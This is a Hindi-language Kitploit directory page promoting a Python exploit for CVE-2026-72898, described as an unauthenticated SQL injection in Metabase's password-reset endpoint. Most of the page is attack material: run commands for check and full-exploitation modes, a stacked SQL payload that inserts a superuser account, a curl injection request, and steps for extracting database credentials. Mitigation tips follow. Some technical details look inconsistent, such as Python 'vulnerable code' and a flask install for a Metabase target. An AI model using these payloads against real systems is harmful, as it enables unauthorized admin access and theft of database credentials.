Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-72898 — CVE-2026-72898 के लिए Python exploit, जो Metabase के password reset endpoint में एक unauthenticated SQL injection है जो admin accounts बनाता है और database credentials निकालता है। | Kitploit
उपकरण/GitHubGitHub/34zy/cve-2026-72898
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगडेटाबेस सुरक्षा
GitHub34zy/cve-2026-72898

CVE-2026-72898

CVE-2026-72898 के लिए Python exploit, जो Metabase के password reset endpoint में एक unauthenticated SQL injection है जो admin accounts बनाता है और database credentials निकालता है।

6घं 12मि पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Metabase SQL Injection RCE

CVSS 10.0 CRITICAL EXPLOITED NO AUTH

Exploitation Demo

Metabase /api/session/reset_password endpoint में अनधिकृत SQL injection। एडमिन अकाउंट बनाता है और डेटाबेस क्रेडेंशियल्स निकालता है।

प्रभावित: v58.0 - v63.3 | पैच किया गया: v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+


त्वरित शुरुआत

root@kitploit:~
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check

भेद्यता

SQL क्वेरी में स्ट्रिंग कॉन्कैटिनेशन:

root@kitploit:~
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"

अटैक पेलोड:

root@kitploit:~
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --

उपयोग

केवल जाँच (कोई संशोधन नहीं):

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 --check

पूर्ण शोषण:

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!

मैनुअल परीक्षण:

root@kitploit:~
# Verify endpoint
curl http://localhost:5000/api/health

# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
  -H "Content-Type: application/json" \
  -d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'

यह क्या करता है

  1. Metabase इंस्टेंस का पता लगाता है (boolean-based SQLi)
  2. SQL injection के माध्यम से एडमिन उपयोगकर्ता बनाता है
  3. नए एडमिन के साथ प्रमाणित करता है
  4. कनेक्टेड डेटाबेस क्रेडेंशियल्स निकालता है
  5. पूर्ण सिस्टम समझौते की पुष्टि करता है

प्रभाव

  • अनधिकृत एडमिन एक्सेस
  • डेटाबेस क्रेडेंशियल निष्कर्षण
  • कनेक्टेड डेटाबेस से समझौता
  • पूर्ण एप्लिकेशन नियंत्रण

शमन

अभी:

  • पैच किए गए संस्करण में अपग्रेड करें
  • WAF के माध्यम से /api/session/reset_password को ब्लॉक करें
  • अनधिकृत जोड़ों के लिए एडमिन अकाउंट का ऑडिट करें
  • सभी डेटाबेस क्रेडेंशियल्स को रोटेट करें

बाद में:

  • पैरामीटरयुक्त क्वेरीज़ का उपयोग करें
  • इनपुट वैलिडेशन जोड़ें
  • सभी संवेदनशील endpoints पर प्रमाणीकरण लागू करें
  • SQL क्वेरी लॉगिंग सक्षम करें

लिंक

  • GitHub Advisory
  • NVD CVE Entry

केवल अधिकृत उपयोग। अनधिकृत पहुँच अवैध है।

टूल डाउनलोड करें